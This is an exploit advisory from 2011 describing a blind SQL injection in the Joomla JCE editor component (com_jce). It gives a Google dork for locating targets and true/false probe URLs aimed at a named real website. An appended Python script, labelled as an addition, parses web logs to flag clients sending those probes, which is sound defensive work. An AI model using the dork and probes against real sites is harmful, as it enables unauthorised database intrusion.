================================================================================================
Joomlacontenteditor (com_jce) BLIND SQL injection vulnerability
================================================================================================
Software: joomlacontenteditor (com_jce)
Vendor: www.joomlacontenteditor.net
Vuln Type: Blind SQL Injection
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com
Home: www.eidelweiss.info
Dork: inurl:"/index.php?option=com_jce"
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
================================================================================================
Description:
JCE makes creating and editing Joomla!® content easy.
Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...
================================================================================================
Exploit & p0c
[!] index.php?option=com_jce&Itemid=[valid Itemid]
Example p0c
[!] http://www.bkjia.com/index.php?option=com_jce&Itemid=8 <= True
[!] http://www.bkjia.com/index.php?option=com_jce&Itemid=-8 <= False
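
Added example (not part of the original advisory or of the JCE project): a log check a site owner could run to find clients sending the Itemid / negated-Itemid request pair shown above, or any non-numeric Itemid, to com_jce. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Apr/2011:10:01:02 +0000] "GET /index.php?option=com_jce&Itemid=8 HTTP/1.1" 200 5120
203.0.113.7 - - [12/Apr/2011:10:01:03 +0000] "GET /index.php?option=com_jce&Itemid=-8 HTTP/1.1" 200 1033
198.51.100.4 - - [12/Apr/2011:10:02:10 +0000] "GET /index.php?option=com_jce&Itemid=8 HTTP/1.1" 200 5120
198.51.100.9 - - [12/Apr/2011:10:03:00 +0000] "GET /index.php?option=com_content&Itemid=-8 HTTP/1.1" 200 900
192.0.2.33 - - [12/Apr/2011:10:04:41 +0000] "GET /index.php?option=com_jce&Itemid=8abc HTTP/1.1" 200 1033
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
PLAIN_ID = re.compile(r"[0-9]+")       # what a legitimate Itemid looks like
SIGNED_ID = re.compile(r"-([0-9]+)")   # the negated form from the advisory

def jce_itemids(log_text):
    """Yield (client_ip, Itemid value) for every request to option=com_jce."""
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_jce" in params.get("option", []):
            for value in params.get("Itemid", []):
                yield ip, value

def flag_clients(log_text):
    """Return {ip: {"malformed": [...], "sign_pairs": [...]}} for clients that
    sent a non-numeric Itemid or asked for both Itemid=N and Itemid=-N."""
    seen = defaultdict(set)
    for ip, value in jce_itemids(log_text):
        seen[ip].add(value)
    report = {}
    for ip, values in seen.items():
        malformed = sorted(v for v in values if not PLAIN_ID.fullmatch(v))
        pairs = sorted(m.group(1) for v in values
                       if (m := SIGNED_ID.fullmatch(v)) and m.group(1) in values)
        if malformed or pairs:
            report[ip] = {"malformed": malformed, "sign_pairs": pairs}
    return report

if __name__ == "__main__":
    for ip, finding in flag_clients(SAMPLE_LOG).items():
        print(ip, finding)
```

A client listed under "sign_pairs" requested the same Itemid with both signs, which ordinary navigation does not produce.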
================================================================================================
Nothing Impossible In This World Even Nobody's Perfect
================================================================================================
=======================================|-= [E0F] =-|============================================